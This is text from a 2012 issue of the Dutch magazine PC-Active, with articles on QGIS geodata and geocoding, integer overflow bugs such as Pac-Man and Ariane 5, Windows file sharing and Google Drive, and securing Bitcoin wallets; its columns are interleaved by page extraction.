Evis Met een Geografisch Informatie Systeem (GIS) kunt u ruimtelijke gegevens opslaan, beheren, bewerken enzovoort. Er zijn niet veel GIS-programma’s die zonder een ingewikkeld conversieproces direct een tabel in een MS Access-database kunnen ontsluiten. Gelukkig beschikt QGIS vanaf versie 1.7 standaard
Nieuwe versie van Quantum GIS
PC-ACTIVE | Nr. 262 – 2012
Geodata.indd 43
43
9/6/12 10:36 AM
Achtergrond
| Geodata
wijs het gpx-bestand aan dat u hiervoor hebt uitgepakt. Indien u deze niet kunt vinden, hebt u wellicht het bestandstype nog op ‘ESRI Shapefiles’ staan. Wijzig dit dan in Alle bestanden. Klik achtereenvolgens op de knoppen Openen en Open. U krijgt dan een scherm te zien van waaruit u kunt kiezen welke informatie u uit het gpx-bestand wilt tonen in de kaart. Selecteer zowel tracks als track_points en sluit af met de knop OK. U ziet vervolgens zowel de route (lijnen) als de knooppunten in de route (punten) in de kaart verschijnen. Met enige moeite is het in QGIS zelfs mogelijk om de getoonde wandeling geanimeerd in beeld te brengen. Dit wil zeggen dat u letterlijk de persoon kunt zien lopen over de kaart. Hiervoor kunt u gebruikmaken van de plug-in TimeManager [6]. In het forum op de site van PC-Active zullen we hier aanvullende aanwijzingen voor opnemen [7]. MS Access-database verbinden met eVis
Voor het uitwisselen van gps-data is het ‘GPS Exchange format’ de de facto standaard. Bestanden in dit formaat (*.gpx) maken gebruik van een op XML gebaseerde opmaaktaal voor geografische data. QGIS is goed in staat om dergelijke bestanden in beeld te brengen. Het aanbod aan gpx-bestanden op het internet is enorm. We maken als voorbeeld gebruik van een bestand met een stadswandeling in Amsterdam dat we hebben gedownload van het internet via de website Gpstrack.nl [5]. Pak de zipfile na het downloaden uit. Indien u de bruggen uit het vorige voorbeeld nog ziet staan, kunt u deze uitzetten met het vinkje in de lagenlijst. Vervolgens kiezen we in het menu Kaartlagen voor de optie Vectorlaag toevoegen. Klik op Bladeren en
Uw adressen op de kaart! Zowel bedrijfsmatig als privé beschikt zo’n beetje iedereen wel over een adressenbestand. Er zijn diverse mogelijkheden om deze adressen op de kaart te zetten waarbij veelal Google Maps wordt gebruikt. Het proces waarmee adressen worden voorzien van coördinaten, heet geocoderen [8]. Een aantal bedrijven biedt een geocodeerservice op commerciële basis aan. Voor een relatief beperkt aantal adressen kunt u echter zelf ook aan de slag met de gratis PDOK Geocodeerservice [9] die gebruikmaakt van de Basisregistratie Adressen en Gebouwen (BAG) [10]. Om één adres te geocoderen kunt u deze service eenvoudig aanroepen in uw internetbrowser. Om bijvoorbeeld te weten te komen waar het adres Nobelweg 6 in Amsterdam ligt, geeft u het volgende in:
De Amsterdamse bruggen in kaart
44
Geodata.indd 44
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:36 AM
GEODATA
| ACHTERGROND
Keuze van informatie uit het gpx-bestand
http://geodata.nationaalgeoregister.nl/geocoder/Geocoder?zoekterm=Nobelweg+6+Amsterd am Met een klein beetje programmeren kunnen we een dergelijke service ook gebruiken om een lijst met adressen in één keer te voorzien van coördinaten. Als voorbeeld hebben we een MS Excel-werkblad voorzien van een macro waarmee u adressen kunt geocoderen. Het werkblad geocoderen.xls, dat deze macro bevat, kunt u na het uitpakken van de zipfile workshop.zip vinden in de directory geocoderen [3]. Vanwege de standaardbeveiliging tegen macrovirussen dient u na het openen van dit bestand aan te geven dat u de macro’s wilt inschakelen die zich in dit werkblad bevinden. Hoe u dat doet, is afhankelijk van uw versie van Excel. Mocht dat niet lukken, dan kunt u hierover een vraag stellen op het PC-Active-forum [7]. Na het openen van het werkblad ziet u een voorbeeldlijst met adressen van een aantal scholen in Amsterdam [11]. De kolommen X en Y in dit werkblad zijn nog leeg. We starten nu het geocoderen door op de sneltoets CTRL-SHIFT-G te drukken. Als alles goed gaat, ziet u dat de kolommen X en Y worden gevuld met Rijksdriehoekscoördinaten [12]. Waar de locatie van een adres niet gevonden kan worden, vult het programma een nul in als coördinaat. Vervolgens vraagt de macro of u het bestand wilt opslaan als tekstbestand (csv) voor gebruik in QGIS. Kies voor Ja en sla het bestand op met de naam geocoderen.csv in een map naar keuze. U maakt vervolgens in QGIS weer gebruik van hetzelfde project als in het vorige voorbeeld. Verberg wel even de gps-kaartlagen in het project door deze uit te vinken. Kies in QGIS voor de menuoptie Kaartlagen en Toevoegen tekengescheidentekst kaartlaag. Selecteer in het nieuwe venster dan bij Bestandsnaam het bestand geocoderen.csv uit de map waarin u dit bestand vanuit Excel hebt opgeslagen. Geef daaronder bij Laagnaam de naam in die de kaartlaag in QGIS moet krijgen, bijvoorbeeld adressen. Vink de optie Geselecteerde tekstscheiders aan en zorg ervoor dat er alléén een vinkje staat bij Komma. Aangezien de kolommen in ons bestand respectievelijk de namen X en Y hebben, worden deze door QGIS automatisch toegewezen aan het veld X Y Velden. Klik op OK. De projectie in het vervolgscherm staat standaard op Amersfoort/RD New, dus u kunt net als in het eerste voorbeeld volstaan met het klikken op OK. Als
CSV-bestand met adressen toevoegen aan QGIS
alles goed gegaan is, ziet u de adressen als gekleurde stippen op de kaart verschijnen. De weergave van de adressen kunt u naar eigen inzicht weer aanpassen door deze te voorzien van een label of een ander symbool. Om uw eigen adressen op de kaart te zetten hoeft u enkel het werkblad geocoderen.xls te voorzien van uw eigen adressen en de macro opnieuw te starten. Let er daarbij wel op dat de informatie in de juiste kolom terechtkomt. De velden Naam, Adres en Woonplaats zijn verplicht. U hoeft de postcode dus niet in te vullen. Eventueel kunt u de bestaande adressen van de scholen in Amsterdam eerst verwijderen. We moeten hierbij wel even aandacht vragen voor de licentie waarop PDOK deze service publiekelijk heeft vrijgegeven. De PDOK fair use policy [13] staat u toe de beschikbaar gestelde services, waaronder de Geocodeerservice, te gebruiken zolang u de PDOK-voorziening niet zo zwaar belast dat andere gebruikers daar hinder van ondervinden. Oftewel zorg ervoor dat u de macro niet gebruikt om lijsten met meer dan honderd adressen in één keer te geocoderen. PDOK kan er namelijk voor zorgen dat u bij misbruik de toegang wordt ontzegd. Houd het dus gezellig, opdat iedereen van deze nuttige voorziening in lengte van jaren gebruik kan maken.
INFOLINK 262018
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262018
PC-ACTIVE | Nr. 262 – 2012
Geodata.indd 45
45
9/6/12 10:37 AM
Getallen die te groot zijn
Abort, retry, fail! tekst : koen vervloesem
Elk programma gebruikt processorregisters waarin getallen tot een bepaalde grootte kunnen worden opgeslagen, maar op de één of andere manier probeert de programmeur er dan toch een groter getal in op te slaan. Het gevolg? In het beste geval raakt een computerspel in de war, in het slechtste geval ontploft er een raket.
E
en zogenoemde integer overflow is een veel voorkomende computerfout. Eigenlijk is hij zelfs ouder dan de computer. Ze komt al voor in alle analoge kilometertellers in auto’s. Zo’n teller beschikt maar over een beperkt aantal cijferplaatsen, oorspronkelijk slechts vijf en soms nog één na de komma. Als u 99.999,9 kilometer had gereden, draaide de teller weer door naar 00000,0 kilometer. Op veel plaatsen vinden we echter nog soortgelijke analoge weergaves van cijfers, zoals op uw gas-, elektriciteits- of watermeter, al moet u wel heel veel verbruiken voor deze cijfers ‘overlopen’.
Digitale overloop Het overlopen van cijfers op een schermpje is hoogstens wat onhandig of grappig, het wordt pas een probleem als iets soortgelijks gebeurt in een computerprogramma dat met deze cijfers verder rekent. En in computerprogramma’s zijn er heel wat kansen om zo’n fout te maken. Processorregisters hebben immers een vaste breedte die bepaalt hoe groot de getallen maximaal mogen zijn die erin worden opgeslagen. Als zo’n processorregister namelijk N bits bevat, kunt u er alle gehele getallen van 0 tot en met 2^N - 1 mee voorstellen. Bijvoorbeeld: 8 bits: 2^8 - 1 = 255 16 bits: 2^16 - 1 = 65535
46
Het logische gevolg is: als u het getal 255 opslaat in een 8-bits register en hierbij 1 optelt, draait dit door naar de waarde 0. Precies deze gebeurtenis was te vinden in het spel Pac-Man. Normaal gesproken worden er aan de onderkant van het scherm maximaal zeven stukken fruit getoond. Maar wanneer de speler van level 255 naar level 256 gaat, draait de interne teller voor het level, die slechts één byte - 8 bits, dus met 2^8 of 256 mogelijke waarden - groot is, door naar 0. De code die het fruit tekent, tekent dan 256 vruchten, waardoor de onderkant van het scherm en de hele rechterkant van het doolhof met willekeurige symbolen worden gevuld en het level niet meer speelbaar is: Pac-Man kan niet genoeg stippen opeten om het niveau te beëindigen. Dit split-screen niveau was een grote verrassing voor de eerste spelers die er terechtkwamen, en nog een grotere verrassing voor de ontwikkelaars, die nooit hadden gedacht dat iemand zo ver zou komen. Ze hadden hier dan ook geen rekening mee gehouden bij het schrijven van hun code. Een uitgebreide analyse van de fout en een patch om deze op te lossen is te vinden op de website van Don Hodges [1]. Een ander knelpunt komen we tegen als we met negatieve getallen werken, dus met signed integers oftewel getallen met teken. Computers gebruiken hiervoor
PC-ACTIVE | Nr. 262 – 2012
Abort Retry Fail.indd 46
9/6/12 10:40 AM
ABORT, RETRY, FAIL!
| ALGEMEEN
Listing 1 L_M_BV_32 := TBD.T_ENTIER_32S ((1.0/C_M_LSB_BV) * G_M_INFO_DERIVE(T_ALG.E_BV)); if L_M_BV_32 > 32767 then P_M_DERIVE(T_ALG.E_BV) := 16#7FFF#; elsif L_M_BV_32 < -32768 then P_M_DERIVE(T_ALG.E_BV) := 16#8000#; else P_M_DERIVE(T_ALG.E_BV) := UC_16S_EN_16NS(TDB.T_ENTIER_16S(L_M_BV_32)); end if; het two’s complement systeem. Dat gaat als volgt: wilt u het 8-bits getal -127 voorstellen, dan nemen we de binaire voorstelling van 127 (01111111), draaien we alle bits om (10000000) en tellen we er 1 bij op. Het resultaat is 10000001. Waarom worden negatieve getallen op deze complex lijkende manier voorgesteld? De verklaring is dat met two’s complement exact dezelfde processorinstructies kunnen worden gebruikt om getallen op te tellen, af te trekken en te vermenigvuldigen als voor positieve gehele getallen. Zolang we geen rekening houden met overflow tenminste... Een N-bits processorregister kan alle gehele getallen van -2^(N-1) tot en met 2^(N-1) - 1 voorstellen in two’s
Ook bij het optellen van getallen die te groot zijn om in het vaste aantal bits te passen, kan er een overflow plaatsvinden. De berekening van 127 + 2 voor 8-bits gehele getallen met teken levert bijvoorbeeld het volgende op: 01111111 + 00000010 = 10000001, en in two’s complement is dit laatste gelijk aan -127. Zo kan het dus voorkomen dat het optellen van twee positieve getallen onterecht een negatief getal oplevert.
Ariane-raket Tijdens zijn eerste vlucht begon de Ariane 5-raket van de European Space Agency 37 seconden na de lancering van zijn pad af te wijken en explodeerde hij. De software voor de Ariane 5 gebruikte de specificaties
Listing 2 P_M_DERIVE(T_ALG.E_BH) := UC_16S_EN_16NS (TDB.T_ENTIER_16S ((1.0/C_M_LSB_BH) * G_M_INFO_DERIVE(T_ALG.E_BH)));
complement. Dat is dus bijvoorbeeld: 8 bits: van -128 tot en met 127 16 bits: van -32768 tot en met 32767 32 bits: van -2147483648 tot en met 2147483647 Negatieve getallen hebben hun eigen problemen met het overlopen. In de programmeertaal C staat deze gebeurtenis zelfs als ‘ongedefinieerd gedrag’ aangeduid. De meeste C-compilers negeren een overflow, zodat het programma dus met verkeerde getallen verder werkt... De asymmetrie van de mogelijke getallen in two’s complement zorgt al voor een subtiel probleem: als we de absolute waarde van het 8-bits getal -128 berekenen, verwachten we 128. Maar dit kan niet, want het grootste 8-bits getal met teken is 127. Wat krijgen we dan wel als resultaat? Dat is eenvoudig te beredeneren: de absolute waarde van een positief getal is het getal zelf; van een negatief getal is dit de negatie van dit getal. En -(-128) is in two’s complement -(10000000). Negatie is in two’s complement alle bits omdraaien en 1 erbij optellen, dus 01111111 + 1 = 10000000. Maar dat is hetzelfde getal als waar we van vertrokken zijn, namelijk -128! Moraal van het verhaal? De absolute waarde van een getal is in de echte wereld niet altijd positief…
van zijn voorganger Ariane 4, terwijl hun traject in het begin toch een stuk uiteenliep. Daardoor lag de horizontale snelheid bij de Ariane 5 heel wat hoger dan verwacht, en trad er in de hier niet op aangepaste software een integer overflow op [2]. Dit had kunnen worden vermeden. Op heel wat andere plaatsen in de gebruikte code werd er wel gecontroleerd op een overflow. Kijkt u maar eens naar de omslachtige code uit Listing 1 om een 64bits getal met komma’s - de verticale snelheid - om te zetten naar een 16-bits geheel getal met teken. U ziet hier duidelijk de controle op de bovengrens (32767) en ondergrens (-32768) van 16-bits gehele getallen met teken. In de code die de horizontale snelheid behandelt, nota bene de regel eronder, werd deze controle echter achterwege gelaten, zoals u kunt zien in Listing 2. En zo kan het weglaten van een kleine controle grote gevolgen hebben...
INFOLINK 262002 Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262002
PC-ACTIVE | Nr. 262 – 2012
Abort Retry Fail.indd 47
47
9/6/12 10:40 AM
h c c !C o m p U s e r s
info: www.CompUsers.nl
Bestanden ‘lokaal’ en ‘in de cloud’ delen Tijdens de workshops op de CompUfair over ‘Bestanden op‐ slaan en delen in de cloud’ (internet) met het programma Dropbox, kreeg ik als workshopleider ook diverse vragen over het delen van bestanden in een lokaal netwerk. Anders gezegd: hoe kun je op een makkelijke manier je net‐ werk met verschillende Windowscomputers inrichten? Wist u dat daarvoor een afzonderlijk, interessant programma be‐ schikbaar is? Het heet Windows Share Manager.
Lokaal
Het programma vermindert het zoeken in de diverse Windowssystemen tot een paar stappen, terwijl die stappen anders in elk Windowssysteem op andere plaatsen moet worden gezocht, soms zelfs met andere benamingen. Kortom, voor de minder gevorderden onder onze lezers, die toch hun bestanden willen delen tussen Windowscomputers onderling of bijvoorbeeld op hun mediaspelers of NAS‐servers, is het een aanrader. Het bevat helaas enkele kleine spel‐ fouten, zoals Registery in plaats van het correcte Registry en Catch waar Cache moet staan, en zo verder.
Werkt op 32‐ en 64‐bit Windowssystemen
Windows Share manager is gemaakt voor gebruikers van de Media Player’s & Streamers. Het helpt u bij het instellen van uw pc voor het op de juiste manier delen van bestanden en mappen onder Windows 8, Windows 7, Windows Vista en Windows XP, zowel bij 32‐ als 64‐bit systemen (X86 en X64). Windows Share Manager heeft de volgende gemakkelijke functies die u helpen bij het delen van bestanden en folders binnen uw eigen netwerk: • Makkelijk slepen en verplaatsen: het bestand is meteen gedeeld binnen uw netwerk voor andere computers, Media Players en/of NAS‐systemen. • Windows Registry Fix met één druk op de knop! • Uw werkgroep aanpassen naar wat het moet zijn voor uw apparaat. • Makkelijk te gebruiken interface: iedereen kan er mee omgaan. • Repareren van folders of bestanden die u verkeerd ge‐ deeld heeft. • Verwijderen van bestanden of folders die u binnen uw netwerk niet meer wenst te delen.
Als u Windows 8, 7, Vista of XP heeft draaien, kan het lastig zijn alle instellingen goed te zetten die nodig zijn; het gaat namelijk om twaalf stappen die u zelf zou moeten uitvoeren. Maar, nu doet Windows Share Manager dit allemaal voor u! Als u het heeft gedownload ziet u het onderstaande scherm op uw computer. In afbeelding 1 ziet u vijf opties om het delen van uw be‐ standen of mappen onder Windows 8, 7, Vista of XP te behe‐ ren. Uw eerste stap zou moeten zijn ‘Mappen of Bestanden delen’. Als u deze knop heeft ingedrukt, ziet u het on‐ derstaande scherm.
Afbeelding 2: De afzonderlijke mappen
U ziet in afbeelding 2 twee mappen staan. ‘Users’ en ‘Den‐ nis’. De map ‘Users’ is de standaard map van Windows, en ‘Dennis’ is de eigen folder waaronder de mappen gevonden kunnen worden met Downloads, Documenten en Afbeeldin‐ gen (alle gegevens van uw eigen account waarmee u inlogt op uw computer.)
U ziet dat hier het account Users niet goed gedeeld is. Om uw bestanden te kunnen delen en streamen dient dit account lees‐ en schrijfrechten te hebben; indien u dit op ‘nee’ laat staan is op uw andere computer het document wel te zien, maar niet te bewerken. We gaan daarom de map repareren. Selecteer de map die u wenst te repareren en kies hierna voor ‘Repareer geselecteerde folder’. De map zal hierna op de rechten ‘Ja’ en ‘Ja’ staan.
Afbeelding 3: Mapopties
Afbeelding 1: Vijf opties voor het delen van bestanden
In normale situaties zal alles voor u klaar zijn en kunt u op uw andere computer kijken of u alles kunt benaderen, ko‐ piëren en aanpassen. Indien u de computer niet ziet en be‐ standen niet kunt aanpassen, zie dan de volgende stappen.
hcc!CompUsers is de grootste interessegroep van de HCC. De activiteiten zijn gericht op het thuisgebruik van computers, vooral op besturingssystemen en een breed terrein van toepassingen. Op deze pagina's kun je kennismaken met het 'aanbod' van kennisoverdracht en diensten. Info: www.CompUsers.nl.
sturingssysteem Android. Ergens in de nabije toekomst zal er nog een applicatie voor de iPhone worden uitgebracht. Extra opslagruimte kost 2,49 dollar per maand en dan krijg je 25 GB en voor 4,99 per maand krijg je 100 GB. Meer kan ook: voor 9,99 per maand krijg je 200 GB; 400 GB kost 19,99 per maand en 1 TB kost 49,99 per maand. Voor 16 TB betaal je 799,99 per maand.
Afbeelding 4: Terug naar het Hoofdscherm
Ga terug naar het hoofdscherm door het tweede scherm te sluiten. U ziet nu het bovenstaande op uw scherm. Kijk op uw tweede computer of op het andere apparaat (NAS of Media Player) wat de werkgroepnaam is. Normaal gesproken is dit WORKGROUP, maar het kan ook een andere naam zijn, en indien uw computer in een werkgroep met een andere naam zit dan de andere apparaten, kunnen ze niet met elkaar communiceren. In dat geval moet je de naam ver‐ anderen; kies voor ‘Verander Werkgroep’ en verander de naam in die van het andere apparaat. Mocht het nu nog allemaal niet lukken, kies dan voor ‘Clear DNS Catch’. Dit zal uw netwerkinstellingen/referenties wis‐ sen. Het beste is om alle computers, mediaplayers en NAS‐ servers opnieuw op te starten.
Indien het andere apparaat aangeeft dat u een netwerk ID en wachtwoord dient in te geven kiest u als laatste redmiddel ‘Sharing Registery Fix’. Het programma is freeware en gemaakt door de Nederlanders Dennis Glas en Jan Kamp. Succes met het delen!
Het programma is nog niet gepubliceerd op de bij deze Soft‐ wareBus behorende DVD GigaHits, maar ik zal de redactie van de GigaHits vragen hem op de volgende DVD aan te bie‐ den. Als u niet zo lang kunt of wilt wachten, ga naar de downloadsectie op http://www.winshare.nl/nl/index.php/ windows‐share‐manager om de laatste versie te downloaden.
‘In de cloud’
Onlangs introduceerde Google haar lang verwachte opslag‐ dienst Google Drive. Om ge‐ bruik te maken van de opslagdienst van Google is uit‐ eraard een Google‐account vereist. Je hebt hier gratis de beschikking over 5 GB opslag‐ ruimte, maar tegen betaling van een vrij klein bedrag kan dit verder uitgebreid worden.
Meer ruimte kost meer
Bestanden die je gaat uploaden mogen maximaal 10 GB groot zijn. Aanvullend op de online opslagdienst zijn er applicaties voor Windows, Mac en voor mobiele apparaten met het be‐
Google Drive versus Dropbox en SkyDrive Ik heb in de afgelopen weken met Goog‐ le Drive geëxperimenteerd en kom tot de conclusie dat Google Drive een waar‐ dig alternatief is voor Dropbox. Vooral de automatische koppeling met uw Google‐account is een voordeel, omdat hiermee ook e‐mail en andere diensten (Gmail, Picasa, Windows Live Mail) toegankelijk zijn.
Uitbreiding van Docs
Bovendien benadrukt Google dat Drive een uitbreiding is van Docs, met de nadruk op online samenwerken en het (samen) editen van documenten.
Sommigen van u zullen dit een nadeel vinden, omdat de gigant Google zo wel heel erg veel van u te weten komt. Dit nadeel geldt overigens in principe voor elke Cloud‐dienst, maar bij Google valt dit wel meer op, omdat Google al veel van iemands surfgedrag weet via hun marktleidende zoek‐ machine.
Werken in de browser
Google Drive kent de mogelijkheid om direct in de browser bestanden te openen, hier‐ voor hoeft dus geen externe applicatie te worden gebruikt. Google Drive maakt gebruik van Google Docs. Tegenhanger Mi‐ crosoft SkyDrive werkt met Office‐ documenten, maar ook met bestanden van Open Office, iets wat Google Drive niet kan. Bij Dropbox moet je gebruik maken van externe programma’s voor editen en (online) samenwerken. Maar als je bezitter bent van apparaten met een Linux‐besturingssysteem, een iPhone of een iPad, bent je toch op Dropbox aangewezen, aangezien Dropbox deze apparaten wel ondersteunt. Kortom er is keuze genoeg!
Frans Dijkhoff
DENKWERK TEKST : KOEN VERVLOESEM
BEVEILIG UW BITCOINS De bitcoin is een digitale munteenheid die niet onder de controle van een centrale bank staat, maar volledig gedistribueerd werkt. Bovendien is de gebruiker ook niet afhankelijk van de grillen van betaaldiensten zoals PayPal. Die vrijheid is verfrissend, maar dit betekent wel dat u zelf verantwoordelijk bent voor de veilige opslag van uw digitale munten.
I
n PC-Active # 247 van mei 2011 bespraken we de werking van Bitcoin [1]. Dat is een vorm van cryptocurrency, digitaal geld dat niet door een centrale bank wordt uitgegeven, maar waarvan de echtheid door cryptografie wordt gewaarborgd. Bitcoin gebruikt een gedistribueerde databank die over computers in een peer-to-peer netwerk is verspreid en waarin alle uitgevoerde transacties staan, voor iedereen zichtbaar. Zo kan iedere deelnemer verifiëren of geld niet dubbel wordt uitgegeven of op een andere wijze wordt vervalst. Elke gebruiker van Bitcoin heeft een ‘portefeuillebestand’, wallet.dat, op zijn computer of gebruikt een third-party wallet service. Hierin wordt een willekeurig aantal cryptografische sleutelparen opgeslagen. Hiervoor gebruikt de munteenheid als algoritme niet het alomtegenwoordige RSA, maar ECDSA, het Elliptic Curve Digital Signature Algorithm. Bij elk Bitcoin-adres - dat in een transactie wordt gebruikt om de zender of ontvanger van een betaling aan te
50
Denkwerk.indd 50
duiden - hoort een geheime sleutel. Het Bitcoin-adres is te berekenen op basis van die geheime sleutel, maar omgekeerd kan dat niet.
Weg is weg Wie de geheime sleutel heeft, kan het bij dit Bitcoinadres horende saldo uitgeven. Het is dus heel belangrijk dat deze sleutel niet in handen van iemand anders valt. Indien dit toch gebeurt, dan moet u zo snel mogelijk het volledige bedrag overmaken naar een ander Bitcoin-adres waarvan de geheime sleutel niet gecompromitteerd is. Bitcoin-transacties kunnen immers nooit worden teruggedraaid. Als iemand uw digitale muntjes heeft overgemaakt naar zijn eigen rekening, is er geen weg terug... Een ander risico is dat u uw wallet kwijtraakt als uw harde schijf het begeeft. U bent dan uw volledige saldo kwijt. Zelfs al kent u uw Bitcoin-adres nog, zonder de bijbehorende geheime sleutel kunt u het saldo niet uitgeven. Het is dus belangrijk dat u back-ups van
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:44 AM
DENKWERK
uw wallet maakt en deze op verschillende locaties opslaat, zeker als er een groot bedrag op staat. Een backup van uw wallet maken kan eenvoudig in het menu Bestand, Back-up portemonnee. Het wallet-bestand staat onder Windows in C:\Gebruikers\Gebruikersnaam\ AppData\Roaming\Bitcoin\wallet.dat en in Linux in ~/.bitcoin/wallet.dat. Het is ook mogelijk uw geheime sleutel te back-uppen met de Bitcoin-client Armory [2], waarop we verderop in dit artikel nog uitgebreid terugkomen. Recente versies van de officiële Bitcoin-client ondersteunen ook encryptie van uw wallet. U kunt een bestaande wallet op elk moment versleutelen in het menu Instellingen, Versleutel portemonnee. U moet dan een passphrase kiezen waarmee de wallet wordt versleuteld. Iemand die uw computer steelt, kan wel de transacties en het saldo in uw digitale portemonnee bekijken, maar zodra hij de bitcoins wil gebruiken, wordt hem om de passphrase gevraagd.
Gespreid risico Het is in het algemeen niet slim om al uw eieren in één mand te leggen: spreiding is een must voor elke veilige belegging, en eigenlijk geldt dit voor alles wat met geld te maken heeft. Zo is het ook geen goed idee om uw hele bitcoin-vermogen in één wallet te steken. Als die portemonnee of de geheime sleutel dan wordt
| ACHTERGROND
gestolen, bent u alles kwijt. Vorig jaar al circuleerde er malware, Infostealer.Coinbit [4] geheten, die specifiek op zoek was naar het bestand wallet.dat op de geïnfecteerde computers van slachtoffers, en die deze dan emailde naar een server in Polen. De maker boekte het saldo vervolgens over naar zijn eigen adressen en kon op die manier veel geld verdienen. Het versleutelen van uw wallet helpt hier natuurlijk wel tegen, maar dan moet u wel een sterk wachtwoord gebruiken. Met toegang tot een gestolen versleutelde wallet kan de hacker immers ook een dictionary attack met bekende wachtwoorden uitproberen. Een goed compromis is dat u altijd een klein bedrag in de wallet op uw primaire computer hebt staan, wel versleuteld maar voor de rest zonder speciale beveiligingsmaatregelen. Hiermee kunt u dan uw dagelijkse transacties met bitcoins uitvoeren. De rest van uw bitcoin-vermogen steekt u in een digitale portefeuille met betere beveiliging. Wanneer u in uw primaire wallet niet genoeg saldo meer hebt, voert u een transactie uit van één van uw beveiligde portemonnees naar uw primaire exemplaar.
StrongCoin Voor wie meer van een webgebaseerde oplossing houdt, is StrongCoin [5] een alternatief. Dit is een website die een versleutelde wallet voor u bijhoudt.
Reconstrueer uw geheime sleutels in Armory
Versleutel uw Bitcoin-portemonnee
PC-ACTIVE | Nr. 262 – 2012
Denkwerk.indd 51
51
9/6/12 10:44 AM
Achtergrond
| Denkwerk
Grote diefstallen Dat we een heel artikel wijden aan de veilige opslag van bitcoins, klinkt misschien overdreven, maar we kunnen het niet genoeg herhalen: als u de veilige cocon van klassieke banken verlaat, draagt u zelf de volledige verantwoordelijkheid voor de bewaking van uw digitale geld. En u moet niet denken dat u weinig risico loopt, doordat Bitcoin nog niet zo bekend is. Er zijn immers al enkele grote bitcoin-diefstallen geweest. Zo werden er in juni 2011 25 duizend digitale munten - indertijd bijna 460 duizend dollar waard - gestolen van één persoon, waarschijnlijk met behulp van een Trojaans paard [3].
De versleuteling van uw geheime sleutel gebeurt bovendien in uw webbrowser, zodat StrongCoin op geen enkel moment de controle over uw bitcoins heeft. Deze dienst belooft elke 24 uur een back-up te maken van uw encrypted sleutels. U kunt op de website echter ook een papieren back-up van uw sleutels maken, die encrypted zijn met de Advanced Encryption Standard, AES. U moet dan natuurlijk wel nog altijd uw wachtwoord onthouden om deze back-up te kunnen gebruiken. Als u het papier eenmaal hebt gecreëerd, bent u niet meer gebonden aan StrongCoin. U kunt evengoed OpenSSL gebruiken om de encrypted sleutel op de paper back-up te ontsleutelen, waarna u deze geheime sleutel in eender welke Bitcoin-client kunt importeren om de controle over uw digitale munten te krijgen. Dat gaat als volgt. Plaats uw versleutelde geheime sleutel in een bestand sleutel.txt en voer de volgende opdracht uit, waarbij u het wachtwoord van StrongCoin ingeeft: openssl enc -d -aes-256-cbc -in sleutel. txt -a Als resultaat krijgt u de voorstelling van uw geheime sleutel in de Base58-library te zien, die u daarna bijvoorbeeld in de Bitcoin-clients Armory, Electrum [6] of de webgebaseerde dienst My Wallet [7] van Blockchain.info [8] kunt importeren. Ook met de officiële Bitcoin-client kunt u geheime sleutels importeren, maar daarvoor moet u de grafische interface verlaten en het commando importprivkey gebruiken.
Exchanges Veel gebruikers beginnen met bitcoins door het inwisselen van euro’s of dollars op een exchange. Maar laat uw hele bitcoin-vermogen hier vervolgens niet op staan, bijvoorbeeld omdat u dat handig vindt om snel te kunnen reageren op veranderlijke wisselkoersen. Er zijn immers al heel wat exchanges gehackt, waarbij niet alleen accountgegevens van klanten werden gestolen, maar ook bitcoins. Zo stalen inbrekers in mei na het kraken van de databank van Bitcoinica meer dan 18.500 bitcoins uit deze exchange. De exchange is daarop stopgezet en er ontspon zich een ware whodunit en een afschuiven van de verantwoordelijkheid. De 17-jarige oprichter had de
52
Denkwerk.indd 52
exchange verkocht en het was niet duidelijk wie nu precies de beveiliging op orde had moeten brengen. Bovendien zijn verschillende exchanges om andere redenen gedwongen geweest om het bijltje erbij neer te gooien, ófwel omwille van gekissebis met betaaldiensten ófwel onder druk van overheden. Hebt u op zo’n moment een grote hoeveelheid bitcoins op een exchange staan, dan kunt u wel eens van een koude kermis thuiskomen. Meer in het algemeen valt op dat tal van exchanges en andere websites rond Bitcoin nogal amateuristisch in elkaar zijn gezet. De makers hebben niet de vereiste technische kennis, maar lijken zich op de hype te storten in de hoop er rijk mee te worden. Er zijn uitzonderingen, maar die zijn schaars in Bitcoin-land. Zorg dus zelf voor de beveiliging van uw geld. En als u toch bitcoins in euro’s of andersom wilt omwisselen, zet dan slechts het bedrag dat u wilt omzetten op de exchange en alleen in de periode dat u wilt handelen. Haal het geld er daarna zo snel mogelijk af. De bitcoins op uw rekening op een exchange zijn feitelijk niet uw bitcoins; uw saldo is eenvoudigweg een getal in een databank en u hebt zelf niet de geheime sleutel die dit saldo controleert. Bovendien moet u voor exchanges sterke wachtwoorden gebruiken en niet hetzelfde wachtwoord als op andere websites. In het afgelopen jaar hebben een aantal exchanges en andere webdiensten wel inspanningen gedaan op beveiligingsgebied en bieden ze bijvoorbeeld tweefactorauthenticatie - zie ook PCActive # 252 van november 2011 - aan. Op de exchange Mt.Gox en in de online wallet My Wallet kunt u een YubiKey gebruiken, zodat een inbreker niet alleen uw wachtwoord moet kennen, maar ook dit stukje hardware moet stelen. De exchange Bitstamp ondersteunt voor tweefactorauthenticatie Google Authenticator; een app op uw smartphone toont een code als tweede authenticatiemethode naast uw wachtwoord.
Armory De third-party Bitcoin-client Armory, die veel geavanceerde functionaliteit aanbiedt, heeft een mooie oplossing voor extra beveiliging gevonden: offline wallets. Dit is mogelijk door de asymmetrische encryptie waarvan Bitcoin gebruikmaakt. Om betalingen te ontvangen hebt u de publieke sleutel nodig, maar om iemand anders te betalen hebt u de bijbehorende geheime sleutel nodig. De officiële Bitcoin-client verenigt beide sleutels op één computer en dus beide acties in één client, maar met Armory is het mogelijk om dit van elkaar los te koppelen [9]. Dit werkt als volgt: u voert al uw Bitcoin-transacties op uw primaire computer uit met Armory, en die pc is natuurlijk online. Daarnaast hebt u een computer die nooit is verbonden met het internet en het liefst een recente versie van Linux draait, bijvoorbeeld een tweedehands netbookje dat u voor een zacht prijsje op de kop hebt getikt. Ook hierop draait u Armory. Op
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:44 AM
DENKWERK
| ACHTERGROND
Vergeet nooit het wachtwoord van uw wallet
Paper wallet van StrongCoin
